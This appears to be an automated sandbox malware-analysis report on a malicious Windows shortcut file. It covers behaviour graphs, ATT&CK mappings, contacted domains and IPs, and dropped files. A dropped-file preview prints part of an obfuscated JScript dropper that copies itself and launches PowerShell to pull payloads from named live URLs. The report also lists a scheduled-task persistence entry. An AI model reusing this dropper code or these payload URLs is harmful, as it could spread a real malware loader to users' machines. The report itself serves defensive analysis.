      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information21
      Scripting      		Valid Accounts1
      Command and Scripting Interpreter      		1
      Scheduled Task/Job      		11
      Process Injection      		21
      Virtualization/Sandbox Evasion      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job      		21
      Scripting      		1
      Scheduled Task/Job      		11
      Process Injection      		LSASS Memory11
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Obfuscated Files or Information      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook1
      DLL Side-Loading      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567188 Sample: G9eWTvswoH.lnk Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 46 www.italialife24.it 2->46 48 italialife24.it 2->48 52 Malicious sample detected (through community Yara rule) 2->52 54 Windows shortcut file (LNK) starts blacklisted processes 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 12 other signatures 2->58 8 wscript.exe 1 1 2->8         started        11 wscript.exe 2->11         started        13 wscript.exe 2->13         started        15 powershell.exe 14 20 2->15         started        signatures3 process4 dnsIp5 60 Windows shortcut file (LNK) starts blacklisted processes 8->60 62 Suspicious powershell command line found 8->62 64 Wscript starts Powershell (via cmd or directly) 8->64 68 2 other signatures 8->68 19 powershell.exe 16 8->19         started        21 powershell.exe 11->21         started        23 powershell.exe 13->23         started        50 italialife24.it 46.254.34.201, 443, 49730, 49731 SERVERPLAN-ASIT Italy 15->50 44 C:\Users\user\AppData\...\evQtmlDaSRMzUk.js, ASCII 15->44 dropped 66 Uses schtasks.exe or at.exe to add and modify task schedules 15->66 25 conhost.exe 1 15->25         started        27 schtasks.exe 1 15->27         started        file6 signatures7 process8 process9 29 wscript.exe 19->29         started        32 conhost.exe 19->32         started        34 schtasks.exe 1 19->34         started        36 conhost.exe 21->36         started        38 schtasks.exe 1 21->38         started        40 wscript.exe 21->40         started        42 conhost.exe 23->42         started        signatures10 70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->70

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      G9eWTvswoH.lnk46%ReversingLabsShortcut.Trojan.Pantera
      G9eWTvswoH.lnk45%VirustotalBrowse
      G9eWTvswoH.lnk100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      italialife24.it0%VirustotalBrowse
      www.italialife24.it0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php0%Avira URL Cloudsafe
      http://crl.microsc0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/00%Avira URL Cloudsafe
      https://www.italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/a0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps10%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-c0%Avira URL Cloudsafe
      http://italialife24.it0%Avira URL Cloudsafe
      http://www.italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      italialife24.it
      		46.254.34.201
      		truetrueunknown
      www.italialife24.it
      		unknown
      		unknowntrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phptrue
      • Avira URL Cloud: safe
      		unknown
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phptrue
      • Avira URL Cloud: safe
      		unknown
      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.phptrue
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.italialife24.itpowershell.exe, 00000000.00000002.1726859837.000001739B2CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B31C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9694000.00000004.00000800.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.phpwscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://go.micropowershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D94AB000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.phppowershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://crl.microscpowershell.exe, 0000000C.00000002.2448566614.000001E7F081A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.italialife24.it/wp-content/uploads/2021/0wscript.exe, 0000000B.00000002.2305543593.0000017912415000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://oneget.orgXpowershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.phppowershell.exe, 00000004.00000002.1882204354.0000026AC67F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://www.italialife24.it/wp-contentwscript.exe, wscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED49000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.italialife24.it/wp-content/uploads/2021/05/awscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED21000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.italialife24.it/wp-cwscript.exe, 00000007.00000002.1828005785.0000025EDB425000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2361827669.000001D1B0A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38F1A2000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://oneget.orgpowershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://italialife24.itpowershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.italialife24.itpowershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.phppowershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        46.254.34.201
                                        		italialife24.itItaly
                                        		52030SERVERPLAN-ASITtrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1567188
                                        Start date and time:2024-12-03 09:13:08 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 9s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:G9eWTvswoH.lnk
                                        renamed because original name is a hash value
                                        Original Sample Name:9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839.lnk
                                        Detection:MAL
                                        Classification:mal100.expl.evad.winLNK@24/13@1/1
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 6
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .lnk

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        03:13:58API Interceptor87x Sleep call for process: powershell.exe modified
                                        08:14:06Task SchedulerRun new task: ZA3XqiywQ path: wscript s>C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        46.254.34.201http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                        • bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        SERVERPLAN-ASITla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                        • 193.70.147.14
                                        Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                        • 185.81.4.143
                                        Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                        • 93.95.216.8
                                        Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                        • 93.95.216.8
                                        citibank_0824_statement.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        https://www.bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousKoiLoaderBrowse
                                        • 46.254.34.201
                                        http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        https://www.baidu.com/link?url=PR7h_t_ZizoWZdjSMLubWVmCX_p6239c2z0KzH4cKS_&wd=ZC5rZW5uZWR5QGNoY2ZsLm9yZw==Get hashmaliciousUnknownBrowse
                                        • 46.254.36.239
                                        ikFn0h3xhF.elfGet hashmaliciousMiraiBrowse
                                        • 46.30.243.162
                                        zietrisikiteFtK.ps1Get hashmaliciousUnknownBrowse
                                        • 185.81.0.180

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eINTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                        • 46.254.34.201
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 46.254.34.201
                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 46.254.34.201
                                        https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                        • 46.254.34.201
                                        http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                        • 46.254.34.201
                                        Content Collaboration Terms.dll.exeGet hashmaliciousLummaC StealerBrowse
                                        • 46.254.34.201
                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                        • 46.254.34.201

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\V58W09DALJEK.js

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (398)
                                        Category:dropped
                                        Size (bytes):1288
                                        Entropy (8bit):5.72170098350198
                                        Encrypted:false
                                        SSDEEP:24:iJr+PoLb+CIzf5j1MVL+kUE+QQAVFC/sqQ1cEE2Rgjzku/uN:ErK0KZVjSVCRH2FCnMbl+Eu/uN
                                        MD5:1D680967CE8A3D3EB3FC67F686C992F2
                                        SHA1:BC5A5F69F25C1B9F767D6B4029F79C81B130176C
                                        SHA-256:24C3D8BAE328D856FF48BD6F99794DFB10660E9382873FC345F86047EABB0F95
                                        SHA-512:0DA5680AB836093E63BA7AA0B5392CFDBD4E5BDE8349293EB1F671252A31BD906133B4C2C3DCF30739E65D044F0B3788EF83935BBCE1874E0966F81F32F1742B
                                        Malicious:false
                                        Preview:var f1="Scr",f2="ing.Fi",f3="stemOb".var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject").var w1="WSc",w2="riPt",w4="eLl".var wsh=w1+w2+".sH"+w4.var bbj=new ActiveXObject(wsh).var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32".var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe".var agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid')+'r.js'.if (WScript.ScriptName != agn) {..var fs5="yFi"..try {..fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\"+agn)..} catch (e) {}.}.var mtx_name="7zPES0BHTJI2".var mtx_file = bbj.ExpandEnvironmentStrings("%t"+"emp%")+"\\"+mtx_name.var fs1="leteFi".var fs2="leExis".try {..fso["De"+fs1+"le"](mtx_file).} catch (e) {}.if (!fso["Fi"+fs2+"ts"](mtx_file)).{..bbj.Run(rd+" -command \"$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'ht

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2g3e14le.blc.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51ualv0q.ung.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jui2snmb.fmb.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgoayipe.u4i.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
